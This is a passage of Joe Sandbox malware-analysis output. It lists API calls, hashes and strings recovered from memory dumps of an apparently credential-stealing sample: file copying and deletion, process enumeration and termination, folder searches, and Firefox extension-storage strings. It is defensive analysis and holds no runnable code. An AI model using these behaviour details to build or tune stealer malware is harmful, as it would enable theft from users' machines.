                                                        • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02CFD6E8
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFD8FF
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFD913
                                                        • DeleteFileA.KERNEL32(00000000), ref: 02CFD992
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                        • Instruction ID: a1ac9d449b83704991e4a49d511b77ec3e188f07a45c7f30f8e86ef8a9b079ae
                                                        • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                        • Instruction Fuzzy Hash: BC91B976910218AACB18EBA4DD94EEE733AEF54304F50456DE606A61E0EF346E48CF71
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                        • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                        • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                        • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02CFDA68
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFDC06
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFDC1A
                                                        • DeleteFileA.KERNEL32(00000000), ref: 02CFDC99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                        • Instruction ID: 2bb7e6cce17e97e92e55be04d812d3568cbadf60be7202d56eeaf19dd0fbc997
                                                        • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                        • Instruction Fuzzy Hash: F581CA769102189BCB08EBA4DD94EEE733AEF54304F50456DE606A62E0EF746E48CF71
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                        • API String ID: 998311485-3310892237
                                                        • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                        • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                        • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                        • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                        APIs
                                                        • memset.MSVCRT ref: 004194EB
                                                          • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                          • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                          • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                        • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                        • String ID:
                                                        • API String ID: 396451647-0
                                                        • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                        • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                        • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                        • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                        APIs
                                                        • memset.MSVCRT ref: 02D09752
                                                          • Part of subcall function 02D08FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02D09785,00000000), ref: 02D08FC2
                                                          • Part of subcall function 02D08FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02D08FC9
                                                          • Part of subcall function 02D08FB7: wsprintfW.USER32 ref: 02D08FDF
                                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02D09812
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 02D09830
                                                        • CloseHandle.KERNEL32(00000000), ref: 02D0983D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                        • String ID:
                                                        • API String ID: 3729781310-0
                                                        • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                        • Instruction ID: 9ab669f1453b26256d0477d1de97ff6375d2862fcbb02a2952f27cb2d060cc7d
                                                        • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                        • Instruction Fuzzy Hash: 3C312875E00248AFDB14DFE0CC98BEDB7B9EB48700F104459E606AA294DB74AE84CF51
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                        • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                        • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • CloseHandle.KERNEL32(?), ref: 00418761
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1066202413-0
                                                        • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                        • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                        • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                        • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02D08931
                                                        • Process32First.KERNEL32(?,00000128), ref: 02D08945
                                                        • Process32Next.KERNEL32(?,00000128), ref: 02D0895A
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • CloseHandle.KERNEL32(?), ref: 02D089C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1066202413-0
                                                        • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                        • Instruction ID: 47652cc00c911348d98dc9d03c5623e81f5c55ba46c839bb00e1833e514b99ca
                                                        • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                        • Instruction Fuzzy Hash: A6314F71941218ABCB24EF95DD94FEEB779EB45704F104199E209A22E0DB346E44CFA1
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                        • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                        • lstrcatA.KERNEL32(?,02EB6048), ref: 00414FAB
                                                        • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                        • String ID:
                                                        • API String ID: 2667927680-0
                                                        • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                        • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                        • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                        • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                        • wsprintfA.USER32 ref: 00418850
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocProcesslstrcpywsprintf
                                                        • String ID: %dx%d
                                                        • API String ID: 2716131235-2206825331
                                                        • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                        • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                        • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                        • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcessstrtok_s
                                                        • String ID:
                                                        • API String ID: 3407564107-0
                                                        • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                        • Instruction ID: d1438aa23e97abfdaa795d2373e81658f7fcbc1c7e04392a546fd8f169aff4f2
                                                        • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                        • Instruction Fuzzy Hash: 871119B5900209EFCB04DFE5D988BEDBB75FF04305F108469E909662A0E7709B45CF65
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                        • wsprintfA.USER32 ref: 004179F3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                        • String ID:
                                                        • API String ID: 1243822799-0
                                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02D07C17
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D07C1E
                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02D07C2B
                                                        • wsprintfA.USER32 ref: 02D07C5A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                        • String ID:
                                                        • API String ID: 377395780-0
                                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction ID: e6a036005e3d5d9cf203efc6f3b7ac38d50c95a49155ba96555a4e8beaacdd97
                                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                        • Instruction Fuzzy Hash: A11139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB5
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02D07CCA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D07CD1
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02D07CE4
                                                        • wsprintfA.USER32 ref: 02D07D1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 3317088062-0
                                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction ID: d4c16dce9830ab89610c61d70698e0770dddf815acfd586606824da5cb0d6d29
                                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction Fuzzy Hash: BF115EB1A45218EFEB208B54DC49FA9B7B8FB05721F10439AE51AA72D0C7746940CF91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s
                                                        • String ID:
                                                        • API String ID: 3330995566-0
                                                        • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                        • Instruction ID: 37d4d5a712dfed9b68697708adcdd448ad3b215fd1ceefb84c2cb8612c45c44d
                                                        • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                        • Instruction Fuzzy Hash: 2E112AB4E00209EFDB14CFE6E988BEEBBB5FB04705F10C069E425A62A0D7749901CF55
                                                        APIs
                                                        • CreateFileA.KERNEL32(02D03D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02D03D55,?), ref: 02D09563
                                                        • GetFileSizeEx.KERNEL32(000000FF,02D03D55), ref: 02D09580
                                                        • CloseHandle.KERNEL32(000000FF), ref: 02D0958E
                                                        Memory Dump Source
